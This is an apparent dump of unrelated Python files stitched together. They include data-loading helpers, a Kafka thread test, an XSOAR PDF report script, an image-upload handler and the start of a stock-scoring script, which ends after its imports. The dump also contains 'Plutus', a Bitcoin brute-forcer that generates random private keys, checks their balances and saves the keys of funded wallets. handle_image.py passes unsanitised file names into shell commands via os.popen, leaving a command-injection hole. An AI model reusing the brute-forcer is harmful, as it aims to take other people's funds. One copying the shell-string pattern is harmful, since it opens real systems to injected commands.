def _worker_main(self, task_queue, data_queue):
"""
generate sample from task queue and put the sample
into a data queue in the form of tf feed_dict
"""
while True:
task = task_queue.get()
sample = self._task_func(task)
if sample is None:
continue
data_queue.put(sample)
def _manager_main(self, queue):
"""
put tasks into queue
"""
for task in self._task_generator():
queue.put(task)
def start_processes(self, sess, n_processes=1):
self.task_queue = multiprocessing.Queue(self.capacity)
self.data_queue = multiprocessing.Queue(self.capacity)
p = multiprocessing.Process(target=self._manager_main, args=(self.task_queue,))
p.daemon = True
p.start()
self.processes.append(p)
for n in range(n_processes):
p = multiprocessing.Process(target=self._worker_main, args=(self.task_queue, self.data_queue))
p.daemon = True
p.start()
self.processes.append(p)
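# Illustrative usage sketch (make_sample and iter_tasks are hypothetical user callables):
#
#   runner = DataRunnerMP(task_func=make_sample, task_generator=iter_tasks, capacity=100)
#   runner.start_processes(sess, n_processes=4)  # `sess` is accepted but not used here
#   feed_dict = runner.get_feed_blobs()          # blocks until a worker has produced a sample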
|
test_threads.py
|
#!/usr/bin/env python
from confluent_kafka import Producer
import threading
import time
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
class IntendedException (Exception):
pass
def thread_run(myid, p, q):
def do_crash(err, msg):
raise IntendedException()
for i in range(1, 3):
cb = None
if i == 2:
cb = do_crash
p.produce('mytopic', value='hi', callback=cb)
t = time.time()
try:
p.flush()
print(myid, 'Flush took %.3f' % (time.time() - t))
except IntendedException:
print(myid, "Intentional callback crash: ok")
continue
print(myid, 'Done')
q.put(myid)
def test_thread_safety():
""" Basic thread safety tests. """
q = Queue()
p = Producer({'socket.timeout.ms': 10,
'message.timeout.ms': 10})
threads = list()
for i in range(1, 5):
thr = threading.Thread(target=thread_run, name=str(i), args=[i, p, q])
thr.start()
threads.append(thr)
for thr in threads:
thr.join()
# Count the number of threads that exited cleanly
cnt = 0
try:
for x in iter(q.get_nowait, None):
cnt += 1
except Empty:
pass
if cnt != len(threads):
raise Exception('Only %d/%d threads succeeded' % (cnt, len(threads)))
print('Done')
if __name__ == '__main__':
test_thread_safety()
|
plutus.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
# Donate: 1B1k2fMs6kEmpxdYor6qvd2MRVUX2zGEHa; if you can Donate also here : 1TakawJC9DKG3cdFT7LazDrfvXvYpSKV7
import requests
import os
import binascii
import ecdsa
import hashlib
import base58
import time
import sys
from multiprocessing import Process, Queue
class pause: # Counts API failures for timeout
p = 0
def privateKey(): # Generates random 256 bit private key in hex format
return binascii.hexlify(os.urandom(32)).decode('utf-8')
def publicKey(privatekey): # Private Key -> Public Key
privatekey = binascii.unhexlify(privatekey)
s = ecdsa.SigningKey.from_string(privatekey, curve = ecdsa.SECP256k1)
return '04' + binascii.hexlify(s.verifying_key.to_string()).decode('utf-8')
def address(publickey): # Public Key -> Wallet Address
alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
    c = '0'
    byte = '00'
    zero = 0
var = hashlib.new('ripemd160')
var.update(hashlib.sha256(binascii.unhexlify(publickey.encode())).digest())
a = (byte + var.hexdigest())
doublehash = hashlib.sha256(hashlib.sha256(binascii.unhexlify(a.encode())).digest()).hexdigest()
address = a + doublehash[0:8]
for char in address:
if (char != c):
break
zero += 1
zero = zero // 2
n = int(address, 16)
output = []
while (n > 0):
n, remainder = divmod (n, 58)
output.append(alphabet[remainder])
count = 0
while (count < zero):
output.append(alphabet[0])
count += 1
return ''.join(output[::-1])
def balance(address): # Query API for wallet balance
try:
API = requests.get("https://blockchain.info/q/addressbalance/" + str(address) + "/balance")
if (API.status_code == 429):
pause.p += 1
if (pause.p >= 10):
print ("\nUnable to connect to API after several attempts\nRetrying in 30 seconds\n")
time.sleep(30)
pause.p = 0
return -1
print("\nHTTP Error Code: " + str(API.status_code) + "\n")
return -1
if (API.status_code != 200 and API.status_code != 400):
print("\nHTTP Error Code: " + str(API.status_code) + "\nRetrying in 5 seconds\n")
time.sleep(5)
return -1
balance = int(API.text)
pause.p = 0
return balance
except:
pause.p += 1
if (pause.p >= 10):
print ("\nUnable to connect to API after several attempts\nRetrying in 30 seconds\n")
time.sleep(30)
pause.p = 0
return -1
def toWIF(privatekey): # Hex Private Key -> WIF format
var80 = "80" + str(privatekey)
var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify(var80)).hexdigest())).hexdigest()
return str(base58.b58encode(binascii.unhexlify(str(var80) + str(var[0:8]))))
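# Illustrative pipeline sketch of what Plutus() below does for every candidate key:
#
#   pk   = privateKey()          # random 256-bit private key (hex)
#   pub  = publicKey(pk)         # uncompressed SECP256k1 public key ('04' + X + Y)
#   addr = address(pub)          # Base58Check-encoded P2PKH address
#   sats = balance(addr)         # balance in satoshi from blockchain.info, or -1 on error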
def Plutus(): # Main Plutus Function
data = [0,0,0,0]
while True:
data[0] = privateKey()
data[1] = publicKey(data[0])
data[2] = address(data[1])
data[3] = balance(data[2])
if (data[3] == -1):
continue
if (data[3] == 0):
print("{:<34}".format(str(data[2])) + " = " + str(data[3]))
if (data[3] > 0):
print ("\naddress: " + str(data[2]) + "\n" +
"private key: " + str(data[0]) + "\n" +
"WIF private key: " + str(toWIF(str(data[0]))) + "\n" +
"public key: " + str(data[1]).upper() + "\n" +
"balance: " + str(data[3]) + "\n")
file = open("plutus.txt","a")
file.write("address: " + str(data[2]) + "\n" +
"private key: " + str(data[0]) + "\n" +
"WIF private key: " + str(toWIF(str(data[0]))) + "\n" +
"public key: " + str(data[1]).upper() + "\n" +
"balance: " + str(data[3]) + "\n" +
"Donate to the author of this program: 1B1k2fMs6kEmpxdYor6qvd2MRVUX2zGEHa;1TakawJC9DKG3cdFT7LazDrfvXvYpSKV7\n\n")
file.close()
### Multiprocessing Extension Made By Wayne Yao https://github.com/wx-Yao ###
def put_dataset(queue):
while True:
if queue.qsize() > 100:
time.sleep(10)
else:
privatekey = privateKey()
publickey = publicKey(privatekey)
Address = address(publickey)
WIF = toWIF(privatekey)
dataset = (Address, privatekey, publickey, WIF)
queue.put(dataset, block = False)
return None
def worker(queue):
time.sleep(1)
while True:
if queue.qsize() > 0:
dataset = queue.get(block = True)
balan = balance(dataset[0])
process_balance(dataset, balan)
else:
time.sleep(3)
return None
def process_balance(dataset,balance):
if balance == -1 :
return None
elif balance == 0 :
print("{:<34}".format(str(dataset[0])) + " = " + str(balance))
return None
else:
addr = dataset[0]
privatekey = dataset[1]
publickey = dataset[2]
WIF = dataset[3]
file = open("plutus.txt","a")
file.write("address: " + str(addr) + "\n" +
"private key: " + str(privatekey) + "\n" +
"WIF private key: " + str(WIF) + "\n" +
"public key: " + str(publickey).upper() + "\n" +
"balance: " + str(balance) + "\n" +
"Donate to the author of this program: 1B1k2fMs6kEmpxdYor6qvd2MRVUX2zGEHa;1TakawJC9DKG3cdFT7LazDrfvXvYpSKV7\n\n")
file.close()
return None
def multi():
processes = []
dataset = Queue()
datasetProducer = Process(target = put_dataset, args = (dataset,))
datasetProducer.daemon = True
processes.append(datasetProducer)
datasetProducer.start()
for core in range(4):
work = Process(target = worker, args = (dataset,))
        work.daemon = True
processes.append(work)
work.start()
try:
datasetProducer.join()
except KeyboardInterrupt:
for process in processes:
process.terminate()
print('\n\n------------------------\nALL PROCESSES TERMINATED\n')
### End of Multiprocessing Extension ###
def main():
if ("-m" in sys.argv):
print("\n-------- MULTIPROCESSING MODE ACTIVATED --------\n")
time.sleep(3)
print("\n|-------- Wallet Address --------| = Balance in Satoshi")
multi()
else:
print("\n|-------- Wallet Address --------| = Balance in Satoshi")
Plutus()
if __name__ == '__main__':
main()
|
dataset.py
|
"""Data fetching with pandas
"""
# MIT License
#
# Copyright (c) 2018 Yichun Shi
# Copyright (c) 2021 Kaen Chan
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import time
import math
import random
import shutil
from functools import wraps
from multiprocessing import Process, Queue
import numpy as np
import pandas as pd
queue_timeout = 600
class Dataset(object):
def __init__(self, path=None, prefix=None):
if path is not None:
self.init_from_path(path)
else:
# self.data = pd.DataFrame([], columns=['path', 'abspath', 'label', 'name'])
self.data = pd.DataFrame([], columns=['abspath', 'label'])
self.prefix = prefix
self.base_seed = 0
self.batch_queue = None
self.batch_workers = None
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
return self.data[key]
    def __delitem__(self, key):
self.data.__delitem__(key)
@property
def num_classes(self):
return len(self.data['label'].unique())
@property
def classes(self):
return self.data['label'].unique()
@property
def size(self):
return self.data.shape[0]
@property
def loc(self):
return self.data.loc
@property
def iloc(self):
return self.data.iloc
def init_from_path(self, path):
if type(path) == list:
self.init_from_folders(path)
return
path = os.path.expanduser(path)
_, ext = os.path.splitext(path)
if os.path.isdir(path):
self.init_from_folder(path)
elif ext == '.txt':
self.init_from_list(path)
else:
            raise ValueError('Cannot initialize dataset from path: %s\n\
                It should be either a folder or a .txt file' % path)
# print('%d images of %d classes loaded' % (len(self.images), self.num_classes))
def init_from_folder(self, folder):
folder = os.path.abspath(os.path.expanduser(folder))
class_names = os.listdir(folder)
class_names.sort()
class_names = class_names[:20000]
print('num_classes', len(class_names))
paths = []
labels = []
names = []
for label, class_name in enumerate(class_names):
classdir = os.path.join(folder, class_name)
if os.path.isdir(classdir):
images_class = os.listdir(classdir)
images_class.sort()
images_class = [os.path.join(class_name,img) for img in images_class]
paths.extend(images_class)
labels.extend(len(images_class) * [label])
names.extend(len(images_class) * [class_name])
abspaths = [os.path.join(folder,p) for p in paths]
# self.data = pd.DataFrame({'path': paths, 'abspath': abspaths, 'label': labels, 'name': names})
self.data = pd.DataFrame({'abspath': abspaths, 'label': labels})
print('num_images', len(names))
self.prefix = folder
def init_from_folders(self, folders):
class_names_all = []
labels_all = []
abspaths_all = []
for folder in folders:
folder = os.path.abspath(os.path.expanduser(folder))
class_names = os.listdir(folder)
class_names.sort()
# class_names = class_names[:30000]
base_label = len(class_names_all)
class_names_all += class_names
print('num_classes', len(class_names), len(class_names_all))
paths = []
labels = []
names = []
for label, class_name in enumerate(class_names):
classdir = os.path.join(folder, class_name)
if os.path.isdir(classdir):
images_class = os.listdir(classdir)
images_class.sort()
images_class = [os.path.join(class_name,img) for img in images_class]
paths.extend(images_class)
labels.extend(len(images_class) * [label + base_label])
names.extend(len(images_class) * [class_name])
abspaths = [os.path.join(folder,p) for p in paths]
labels_all += labels
abspaths_all += abspaths
self.data = pd.DataFrame({'abspath': abspaths_all, 'label': labels_all})
print('num_images', len(abspaths_all))
self.prefix = folders
def init_from_list(self, filename, folder_depth=2):
print('init_from_list', filename)
with open(filename, 'r') as f:
lines = f.readlines()
lines = [line.strip().split(' ') for line in lines]
abspaths = [os.path.abspath(line[0]) for line in lines]
paths = ['/'.join(p.split('/')[-folder_depth:]) for p in abspaths]
if len(lines[0]) == 2:
labels = [int(line[1]) for line in lines]
names = [str(lb) for lb in labels]
elif len(lines[0]) == 1:
names = [p.split('/')[-folder_depth] for p in abspaths]
_, labels = np.unique(names, return_inverse=True)
else:
raise ValueError('List file must be in format: "fullpath(str) \
label(int)" or just "fullpath(str)"')
self.data = pd.DataFrame({'path': paths, 'abspath': abspaths, 'label': labels, 'name': names})
self.prefix = abspaths[0].split('/')[:-folder_depth]
print('num_classes', np.max(labels)+1)
print('num_images', len(names))
def write_datalist_to_file(self, filename):
print('write_datalist_to_file', filename)
with open(filename, 'w') as f:
s = ''
for index, row in self.data.iterrows():
s += row['abspath'] + ' ' + str(row['label']) + '\n'
if index % 10000 == 0:
print(index)
f.write(s)
s = ''
if len(s) > 0:
f.write(s)
        exit(0)  # terminates the whole process right after writing the list
#
# Data Loading
#
def set_base_seed(self, base_seed=0):
self.base_seed = base_seed
def _random_samples_from_class(self, label, num_samples, exception=None):
# indices_temp = self.class_indices[label]
indices_temp = list(np.where(self.data['label'].values == label)[0])
if exception is not None:
indices_temp.remove(exception)
assert len(indices_temp) > 0
# Sample indices multiple times when more samples are required than present.
indices = []
iterations = int(np.ceil(1.0*num_samples / len(indices_temp)))
for i in range(iterations):
sample_indices = np.random.permutation(indices_temp)
indices.append(sample_indices)
indices = list(np.concatenate(indices, axis=0)[:num_samples])
return indices
def _get_batch_indices(self, batch_format):
''' Get the indices from index queue and fetch the data with indices.'''
indices_batch = []
batch_size = batch_format['size']
num_classes = batch_format['num_classes']
assert batch_size % num_classes == 0
num_samples_per_class = batch_size // num_classes
idx_classes = np.random.permutation(self.classes)[:num_classes]
indices_batch = []
for c in idx_classes:
indices_batch.extend(self._random_samples_from_class(c, num_samples_per_class))
return indices_batch
def _get_batch(self, batch_format):
indices = self._get_batch_indices(batch_format)
batch = {}
for column in self.data.columns:
batch[column] = self.data[column].values[indices]
return batch
# Multithreading preprocessing images
def _batch_queue_worker_t(self, seed):
np.random.seed(seed+self.base_seed)
while True:
batch = self._get_batch(self.batch_format)
if self.proc_func is not None:
batch['image'] = self.proc_func(batch['abspath'])
self.batch_queue.put(batch)
def start_batch_queue2(self, batch_format, proc_func=None, maxsize=5, num_threads=4):
self.proc_func = proc_func
self.batch_format = batch_format
self.batch_queue = Queue(maxsize=maxsize)
self.batch_workers = []
for i in range(num_threads):
worker = Process(target=self._batch_queue_worker_t, args=(i,))
worker.daemon = True
worker.start()
self.batch_workers.append(worker)
def pop_batch_queue2(self, timeout=queue_timeout):
return self.batch_queue.get(block=True, timeout=timeout)
def start_batch_queue(self, batch_format, proc_func=None, maxsize=5, num_threads=4):
self.proc_func = proc_func
self.batch_format = batch_format
def pop_batch_queue(self, timeout=queue_timeout):
batch = self._get_batch(self.batch_format)
if self.proc_func is not None:
batch['image'] = self.proc_func(batch['abspath'])
return batch
    def release_queue(self):
        # index_queue/index_worker are not created in __init__, so guard with getattr
        # to avoid an AttributeError when only the batch queue was started.
        if getattr(self, 'index_queue', None) is not None:
            self.index_queue.close()
        if self.batch_queue is not None:
            self.batch_queue.close()
        if getattr(self, 'index_worker', None) is not None:
            self.index_worker.terminate()
            self.index_worker = None
        if self.batch_workers is not None:
            for w in self.batch_workers:
                w.terminate()
            self.batch_workers = None
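# Illustrative usage sketch (the image folder and `load_images` preprocessing function
# are placeholders, not part of this module):
#
#   dataset = Dataset('/path/to/train_folder')            # one sub-folder per class
#   batch_format = {'size': 64, 'num_classes': 16}        # 4 samples drawn per class
#   dataset.start_batch_queue2(batch_format, proc_func=load_images, num_threads=4)
#   batch = dataset.pop_batch_queue2()                    # keys: 'abspath', 'label', 'image'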
|
utils.py
|
import math
import os.path as osp
import multiprocessing
from timeit import default_timer as timer
import numpy as np
import torch
import matplotlib.pyplot as plt
class benchmark(object):
def __init__(self, msg, enable=True, fmt="%0.3g"):
self.msg = msg
self.fmt = fmt
self.enable = enable
def __enter__(self):
if self.enable:
self.start = timer()
return self
def __exit__(self, *args):
if self.enable:
t = timer() - self.start
print(("%s : " + self.fmt + " seconds") % (self.msg, t))
self.time = t
def quiver(x, y, ax):
ax.set_xlim(0, x.shape[1])
ax.set_ylim(x.shape[0], 0)
ax.quiver(
x,
y,
units="xy",
angles="xy",
scale_units="xy",
scale=1,
minlength=0.01,
width=0.1,
color="b",
)
def recursive_to(input, device):
if isinstance(input, torch.Tensor):
return input.to(device)
if isinstance(input, dict):
for name in input:
if isinstance(input[name], torch.Tensor):
input[name] = input[name].to(device)
return input
if isinstance(input, list):
for i, item in enumerate(input):
input[i] = recursive_to(item, device)
return input
assert False
def np_softmax(x, axis=0):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum(axis=axis, keepdims=True)
def argsort2d(arr):
return np.dstack(np.unravel_index(np.argsort(arr.ravel()), arr.shape))[0]
def __parallel_handle(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count(), progress_bar=lambda x: x):
if nprocs == 0:
nprocs = multiprocessing.cpu_count()
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [
multiprocessing.Process(target=__parallel_handle, args=(f, q_in, q_out))
for _ in range(nprocs)
]
for p in proc:
p.daemon = True
p.start()
try:
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in progress_bar(range(len(sent)))]
[p.join() for p in proc]
except KeyboardInterrupt:
q_in.close()
q_out.close()
raise
return [x for i, x in sorted(res)]
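# Illustrative usage of parmap (example only, not from the original module):
# results = parmap(lambda x: x * x, range(100), nprocs=4)
# Each item of X is sent to a worker process and results come back in input order.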
|
SanePdfReport.py
|
import demistomock as demisto
from CommonServerPython import *
import traceback
import os
import shlex
import base64
import random
import string
import subprocess
from pathlib import Path
import threading
import time
import http
import socket  # used below to probe the markdown artifacts server port
from http.server import HTTPServer
WORKING_DIR = Path("/app")
INPUT_FILE_PATH = 'sample{id}.json'
OUTPUT_FILE_PATH = 'out{id}.pdf'
DISABLE_LOGOS = True # Bugfix before sane-reports can work with image files.
MD_IMAGE_PATH = '/markdown/image'
MD_HTTP_PORT = 10888
SERVER_OBJECT = None
MD_IMAGE_SUPPORT_MIN_VER = '6.5'
TABLE_TEXT_MAX_LENGTH_SUPPORT_MIN_VER = '7.0'
def random_string(size=10):
return ''.join(
random.choices(string.ascii_uppercase + string.digits, k=size))
def find_zombie_processes():
"""find zombie proceses
Returns:
([process ids], raw ps output) -- return a tuple of zombie process ids and raw ps output
"""
ps_out = subprocess.check_output(['ps', '-e', '-o', 'pid,ppid,state,stime,cmd'],
stderr=subprocess.STDOUT, universal_newlines=True)
lines = ps_out.splitlines()
pid = str(os.getpid())
zombies = []
if len(lines) > 1:
for line in lines[1:]:
pinfo = line.split()
if pinfo[2] == 'Z' and pinfo[1] == pid: # zombie process
zombies.append(pinfo[0])
return zombies, ps_out
def quit_driver_and_reap_children(killMarkdownServer):
try:
if killMarkdownServer:
# Kill Markdown artifacts server
global SERVER_OBJECT
if SERVER_OBJECT:
demisto.debug("Shutting down markdown artifacts server")
SERVER_OBJECT.shutdown()
zombies, ps_out = find_zombie_processes()
if zombies:
demisto.info(f'Found zombie processes will waitpid: {ps_out}')
for pid in zombies:
waitres = os.waitpid(int(pid), os.WNOHANG)[1]
demisto.info(f'waitpid result: {waitres}')
else:
demisto.debug(f'No zombie processes found for ps output: {ps_out}')
except Exception as e:
demisto.error(f'Failed checking for zombie processes: {e}. Trace: {traceback.format_exc()}')
def startServer():
class fileHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
demisto.debug(f'Handling MD Image request {self.path}')
if not self.path.startswith(MD_IMAGE_PATH):
# not a standard xsoar markdown image endpoint
self.send_response(400)
self.flush_headers()
return
fileID = os.path.split(self.path)[1]
try:
res = demisto.getFilePath(fileID)
file_path = res.get('path')
if file_path == '':
demisto.debug(f'Failed to get markdown file {fileID}, empty filepath returned from xsoar')
self.send_response(404)
self.flush_headers()
return
name = res.get('name')
try:
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Disposition", f'attachment; filename={name}')
self.end_headers()
# Open the file
with open(f'{file_path}', 'rb') as file:
self.wfile.write(file.read()) # Read the file and send the contents
self.flush_headers()
except BrokenPipeError: # ignore broken pipe as socket might have been closed
pass
except Exception as ex:
demisto.debug(f'Failed to get markdown file {fileID}. Error: {ex}')
self.send_response(404)
self.flush_headers()
# Make sure the server is created at current directory
os.chdir('.')
# Create server object listening the port 10888
global SERVER_OBJECT
SERVER_OBJECT = HTTPServer(server_address=('', MD_HTTP_PORT), RequestHandlerClass=fileHandler)
# Start the web server
SERVER_OBJECT.serve_forever()
def main():
try:
sane_json_b64 = demisto.args().get('sane_pdf_report_base64', '').encode(
'utf-8')
orientation = demisto.args().get('orientation', 'portrait')
resourceTimeout = demisto.args().get('resourceTimeout', '4000')
reportType = demisto.args().get('reportType', 'pdf')
headerLeftImage = demisto.args().get('customerLogo', '')
headerRightImage = demisto.args().get('demistoLogo', '')
pageSize = demisto.args().get('paperSize', 'letter')
disableHeaders = demisto.args().get('disableHeaders', '')
tableTextMaxLength = demisto.args().get('tableTextMaxLength', '300')
# Note: After headerRightImage the empty one is for legacy argv in server.js
extra_cmd = f"{orientation} {resourceTimeout} {reportType} " + \
f'"{headerLeftImage}" "{headerRightImage}" "" ' + \
f'"{pageSize}" "{disableHeaders}"'
isMDImagesSupported = is_demisto_version_ge(MD_IMAGE_SUPPORT_MIN_VER)
if isMDImagesSupported: # pragma: no cover
# start the server in a background thread
demisto.debug('Starting markdown artifacts http server...')
threading.Thread(target=startServer).start()
time.sleep(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('localhost', MD_HTTP_PORT))
if result == 0:
demisto.debug('Server is running')
sock.close()
else:
demisto.error('Markdown artifacts server is not responding')
# add md server address
mdServerAddress = f'http://localhost:{MD_HTTP_PORT}'
extra_cmd += f' "" "" "{mdServerAddress}"'
isTableTextMaxLengthSupported = is_demisto_version_ge(TABLE_TEXT_MAX_LENGTH_SUPPORT_MIN_VER)
if isTableTextMaxLengthSupported:
extra_cmd += f' {tableTextMaxLength}'
# Generate a random input file so we won't override on concurrent usage
input_id = random_string()
input_file = INPUT_FILE_PATH.format(id=input_id)
with open(WORKING_DIR / input_file, 'wb') as f:
f.write(base64.b64decode(sane_json_b64))
# Generate a random output file so we won't override on concurrent usage
output_id = random_string()
output_file = OUTPUT_FILE_PATH.format(id=output_id)
cmd = ['./reportsServer', input_file, output_file, 'dist'] + shlex.split(
extra_cmd)
# Logging things for debugging
params = f'[orientation="{orientation}",' \
f' resourceTimeout="{resourceTimeout}",' \
f' reportType="{reportType}", headerLeftImage="{headerLeftImage}",' \
f' headerRightImage="{headerRightImage}", pageSize="{pageSize}",' \
f' disableHeaders="{disableHeaders}"'
if isMDImagesSupported:
params += f', markdownArtifactsServerAddress="{mdServerAddress}"'
LOG(f"Sane-pdf parameters: {params}]")
cmd_string = " ".join(cmd)
LOG(f"Sane-pdf cmd: {cmd_string}")
LOG.print_log()
# Execute the report creation
out = subprocess.check_output(cmd, cwd=WORKING_DIR,
stderr=subprocess.STDOUT)
LOG(f"Sane-pdf output: {str(out)}")
abspath_output_file = WORKING_DIR / output_file
with open(abspath_output_file, 'rb') as f:
encoded = base64.b64encode(f.read()).decode('utf-8', 'ignore')
os.remove(abspath_output_file)
return_outputs(readable_output='Successfully generated pdf',
outputs={}, raw_response={'data': encoded})
except subprocess.CalledProcessError as e:
tb = traceback.format_exc()
wrap = "=====sane-pdf-reports error====="
err = f'{wrap}\n{tb}{wrap}, process error: {e.output}\n'
return_error(f'[SanePdfReports Automation Error - CalledProcessError] - {err}')
except Exception:
tb = traceback.format_exc()
wrap = "=====sane-pdf-reports error====="
err = f'{wrap}\n{tb}{wrap}\n'
return_error(f'[SanePdfReports Automation Error - Exception] - {err}')
finally:
quit_driver_and_reap_children(isMDImagesSupported)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
handle_image.py
|
#!/usr/bin/env python3
# Handles images uploaded by users
import os
import sys
import json as JSON
from PIL import Image
import threading
next_id = 0
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def near_value(i):
if i < 64:
return 0
elif i < 64*2:
return 1
elif i < 64*3:
return 2
else:
return 3
def restore_value(i):
return i*85
def decimal_to_binary(i):
return '{0:08b}'.format(i)
def binary_to_decimal(i):
return int(i, 2)
def get_value(i):
return binary_to_decimal("00000000"[:8-len(i)]+i)
def merge(image_1, image_2):
image_2 = image_2.resize(image_1.size)
data_1 = image_1.load()
data_2 = image_2.load()
result = Image.new(image_1.mode, image_1.size)
result_data = result.load()
for i in range(image_1.size[0]):
for j in range(image_1.size[1]):
r1, g1, b1, a1 = data_1[i, j]
r2, g2, b2, a2 = data_2[i, j]
result_data[i, j] = (binary_to_decimal(decimal_to_binary(r1)[:6]+decimal_to_binary(near_value(r2))[6:]),
binary_to_decimal(decimal_to_binary(g1)[:6]+decimal_to_binary(near_value(g2))[6:]),
binary_to_decimal(decimal_to_binary(b1)[:6]+decimal_to_binary(near_value(b2))[6:]),
binary_to_decimal(decimal_to_binary(a1)[:6]+decimal_to_binary(near_value(a2))[6:]))
# print(data_1.size)
return result
def unmerge(image, size=[1920, 1080]):
data = image.load()
result = Image.new(image.mode, image.size)
result_data = result.load()
for i in range(image.size[0]):
for j in range(image.size[1]):
r, g, b, a = data[i, j]
result_data[i, j] = (restore_value(get_value(decimal_to_binary(r)[6:])),
restore_value(get_value(decimal_to_binary(g)[6:])),
restore_value(get_value(decimal_to_binary(b)[6:])),
restore_value(get_value(decimal_to_binary(a)[6:])))
result = result.resize(size)
return result
def do_merge(image_1, image_2, output_name):
global next_id
temp_id = next_id
next_id += 1
print("next id is "+str(temp_id))
result = merge(image_1, image_2)
print("Saving result ...")
result.save(output_name)
print("Successful!")
def detect_images():
path = "static/images/"
result = os.popen("ls "+path).read().split("\n")
result = result[:len(result)-1]
result_temp = result.copy()
result = []
for i in result_temp:
if ".json" in i:
result.append(int(i[:i.index(".json")]))
result.sort()
index = 0
ids = []
while True:
if index not in result:
ids.append(index)
index += 1
if index >= result[len(result)-1]:
ids.append(index+1)
break
return ids
class handle_images():
def __init__(self):
self.ids = detect_images()
def update_next_id(self):
if len(self.ids) > 1:
self.next_id = self.ids[0]
self.ids = self.ids[1:]
elif len(self.ids) == 1:
self.next_id = self.ids.pop()
else:
self.next_id += 1
def add_image(self, image):
location = image["info"]["location"]
image["file"].save(location+".png")
# Convert the upload to 32-bit PNG so it has the RGBA channels merge() expects.
os.popen("convert "+location+".png"+" png32:"+location+".temp.png").read()
uploaded = Image.open(location+".temp.png")
image_hidden = Image.open("static/watermark_image/b.png")
# Embed the watermark thumbnail in a background thread.
eg = threading.Thread(target=do_merge, args=(uploaded, image_hidden, location+".thumbnail.png"))
eg.start()
with open(location+".json", "w") as file:
JSON.dump(image["data"], file)
def remove_images(self, image_ids):
for image_id in image_ids:
result = os.popen("rm "+image_id+"*").read()
def remove_image(self, location):
result = os.popen("rm "+location+"*").read()
def update_image_info(self, image_id, info):
data = self.get_image_info(image_id)
for i in info:
if info[i] != data[i]:
data[i] = info[i]
with open(image_id+".json", "w") as file:
JSON.dump(data, file)
return data
def get_image_info(self, image_id):
with open(image_id+".json", "r") as file:
data = JSON.load(file)
return data
def get_image_location(self):
result = "static/images/"+str(self.next_id)
self.update_next_id()
return result
if __name__ == "__main__":
ids = detect_images()
print(ids)
hi = handle_images()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
hi.update_next_id()
|
piotroski_advanced.py
|
#!/usr/bin/env python3
# The analysis applies the principles of Joseph D. Piotroski,
# set out in the paper "Value Investing: The Use of Historical Financial Statement Information to Separate Winners from Losers".
# In Piotroski's original study, over 20 years (1976-1996), an investment strategy based on this score (buying companies with a high F-Score and selling companies with a low F-Score) produced an annual return of 23%, well above the market average.
# Piotroski devised a score, the "Piotroski F-Score", ranging from 0 to 9: the higher it is, the more of the filters the stock has passed.
# This is the advanced method: besides comparing last year's data with the current year's,
# it also compares the data from two years ago with last year's.
# Criteria used:
# Last Year vs. Current Year
# 1. ROA > 0 (current year)
# 2. Operating cash flow (FCO) > 0 (current year)
# 3. FCO > Net Income (current year)
# 4. Current ROA > previous year's ROA
# 5. Current leverage < last year's (Net Debt / Shareholders' Equity)
# 6. Current Current Ratio > previous year's Current Ratio
# 7. Current number of shares = previous year's number of shares
# 8. Current Gross Margin > previous year's Gross Margin
# 9. Current Asset Turnover > previous year's Asset Turnover
# Two Years Ago vs. Last Year
# 10. ROA > 0 (last year)
# 11. FCO > 0 (last year)
# 12. FCO > Net Income (last year)
# 13. Last year's ROA > ROA of two years ago
# 14. Last year's leverage < two years ago (Net Debt / Shareholders' Equity)
# 15. Last year's Current Ratio > Current Ratio of two years ago
# 16. Last year's number of shares = number of shares two years ago
# 17. Last year's Gross Margin > Gross Margin of two years ago
# 18. Last year's Asset Turnover > Asset Turnover of two years ago
# Reference: https://medium.com/@gutenbergn/piotroski-d9a722b8ef9a
# Backtesting on USA: https://www.quant-investing.com/blogs/backtests/2018/11/06/piotroski-f-score-back-test
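# Illustrative sketch (not part of the original script): the score is simply the number
# of the boolean criteria above that hold for a company, e.g.
#     score = sum(int(passed) for passed in infos[ticker].values())
# The actual computation below accumulates the same sum column by column in fill_special_infos().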
import sys, os
sys.path.extend([f'../{name}' for name in os.listdir("..") if os.path.isdir(f'../{name}')])
import fundamentus
import bovespa
import backtest
import browser
import pandas
import numpy
import http.cookiejar
import urllib.request
import json
import threading
import time
import pyperclip
# def print(thing):
# import pprint
# return pprint.PrettyPrinter(indent=4).pprint(thing)
